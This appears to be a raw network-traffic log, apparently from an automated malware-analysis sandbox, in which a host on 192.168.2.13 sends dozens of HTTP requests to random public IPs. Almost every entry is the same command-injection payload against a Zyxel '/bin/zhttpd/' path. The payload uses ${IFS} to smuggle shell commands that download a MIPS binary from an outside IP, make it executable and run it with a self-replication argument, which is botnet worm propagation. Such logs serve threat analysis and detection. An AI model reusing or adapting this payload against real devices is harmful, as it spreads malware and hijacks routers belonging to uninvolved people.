                                    Jan 13, 2024 19:02:43.402333021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6755192.168.2.133561434.56.49.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402371883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6756192.168.2.1358206168.132.151.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402446032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6757192.168.2.1356194151.55.14.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402518988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6758192.168.2.1333506219.111.221.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402558088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6759192.168.2.1355202144.98.168.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402616978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6760192.168.2.136074051.163.207.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402656078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6761192.168.2.1357450129.168.11.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402729034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6762192.168.2.133944825.54.205.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402770996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6763192.168.2.1334342106.241.209.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402853966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6764192.168.2.1355516172.40.129.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402932882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6765192.168.2.1355412217.0.87.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.402987003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6766192.168.2.1343162209.226.6.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403042078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6767192.168.2.1354328150.96.93.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403084040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6768192.168.2.1353812191.224.55.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403114080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6769192.168.2.1350410152.152.54.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403157949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6770192.168.2.1347848129.13.93.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403230906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6771192.168.2.1340058200.218.64.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403258085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6772192.168.2.136041847.8.178.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403290033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6773192.168.2.134254684.250.80.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403353930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6774192.168.2.133593242.34.85.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403407097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6775192.168.2.1352878199.212.9.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403465033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6776192.168.2.133682419.126.116.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403534889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6777192.168.2.134394249.250.187.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403572083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6778192.168.2.135592458.222.43.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403593063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6779192.168.2.1346142210.6.12.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403661013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6780192.168.2.133425462.100.123.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403753996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6781192.168.2.1357742124.91.215.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403821945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6782192.168.2.1348640108.0.61.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403844118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6783192.168.2.134922675.174.199.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403907061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6784192.168.2.1353710196.146.237.215443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.403995037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6785192.168.2.1333828211.178.137.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404011011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6786192.168.2.1340078148.229.207.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404092073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6787192.168.2.133730298.56.36.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404133081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6788192.168.2.135987475.162.125.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404189110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6789192.168.2.1335424219.30.230.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404278994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6790192.168.2.13505489.15.18.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404330015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6791192.168.2.134001087.217.236.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404364109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6792192.168.2.133603245.57.24.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404407024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6793192.168.2.134396270.104.37.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404442072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6794192.168.2.1345374198.116.31.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404521942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6795192.168.2.1342810207.175.82.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404604912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6796192.168.2.133383650.55.19.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404678106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6797192.168.2.1349112109.106.206.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404762983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6798192.168.2.1358384154.29.206.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404784918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6799192.168.2.1355994137.215.236.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404827118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6800192.168.2.133932290.98.64.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404890060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6801192.168.2.1340170123.152.117.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.404951096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6802192.168.2.1349098206.3.96.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405009985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6803192.168.2.1349900135.54.21.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405065060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6804192.168.2.1357768118.222.156.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405098915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6805192.168.2.134645014.42.26.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405152082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6806192.168.2.1334412158.249.246.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405236006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6807192.168.2.134525239.164.218.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405339003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6808192.168.2.1341680175.192.124.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405375004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6809192.168.2.1347478201.62.166.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405411005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6810192.168.2.1356458107.83.36.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405478001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6811192.168.2.1343156200.173.227.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405570984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6812192.168.2.1341048102.103.217.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405635118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6813192.168.2.135329045.221.111.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405682087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6814192.168.2.1344138193.140.91.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405777931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6815192.168.2.1342580143.59.52.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405843973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6816192.168.2.135872095.224.214.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.405910969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6817192.168.2.1345020111.29.42.118443
                                    TimestampBytes transferredDirectionData
